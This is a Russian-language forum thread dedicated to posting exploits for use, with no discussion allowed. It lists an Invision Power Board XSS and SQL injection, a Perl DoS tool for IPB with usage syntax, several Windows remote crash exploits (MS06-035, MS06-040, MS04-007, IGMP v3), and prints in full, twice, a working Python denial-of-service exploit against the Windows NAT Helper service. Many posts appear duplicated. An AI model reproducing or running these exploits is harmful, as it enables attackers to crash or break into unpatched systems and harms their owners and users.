( Вход | Регистрация | Поиск )
Exploits, Постим эксплойты
Стандартный · [ Линейный ]
Дата обновления: 30.09.2009 - 06:52, перейти к новому сообщению
Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,
Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Сплойт:
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,
Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Сплойт:
» Exploit «
Ответов(10 - 19)
Появился эксплойт для DOS-атаки на форум IPB 2.1.х (до 2.1.7). Написан на Перле. Работает на всех версиях MySQL, для успешной работы требует magic_quotes_gpc = 0. Эксплуатирует уязвимость с CLIENT_IP (от 8.06.2006).
Использование очень простое и стандартное:
[путь к перлу] [путь к эксплойту] www.site.com /ipb/
Использование очень простое и стандартное:
[путь к перлу] [путь к эксплойту] www.site.com /ipb/
» Нажмите, для открытия спойлера «
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
Описание:
сплойт вешает тачку без установленного апдейта
говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)
Описание:
сплойт вешает тачку без установленного апдейта
» exploit code here «
говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)
И ещё один сплойт бьющий на отказ Microsoft Windows 2000 SP0-SP4, Microsoft Windows XP SP0-SP1, Microsoft Windows NT 4.0
MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)
Скомпиленный здесь:
MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)
» sources here «
Скомпиленный здесь:
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
Posted by iLLuZionist
Respect!
Compeled Version:
Posted by iLLuZionist
Respect!
Compeled Version:
IGMP v3 DoS Exploit
Эфект тот же что и от EvilIGMP, только консольный вариант + исходник
Добавлено:
Ну и чуть не забыл
Откомпиленая версия:MS04-007-dos
Posted by Raider_Singer
На удаленной системе должен быть открытым 445 порт
XP-SP0, SP-1, 2k, 2003
Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##
from socket import *
from time import sleep
host = "192.168.0.1"
port = 53
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)
s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
# EoF
Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##
from socket import *
from time import sleep
host = "192.168.0.1"
port = 53
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)
s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
# EoF
SoftoRooM © 2004-2024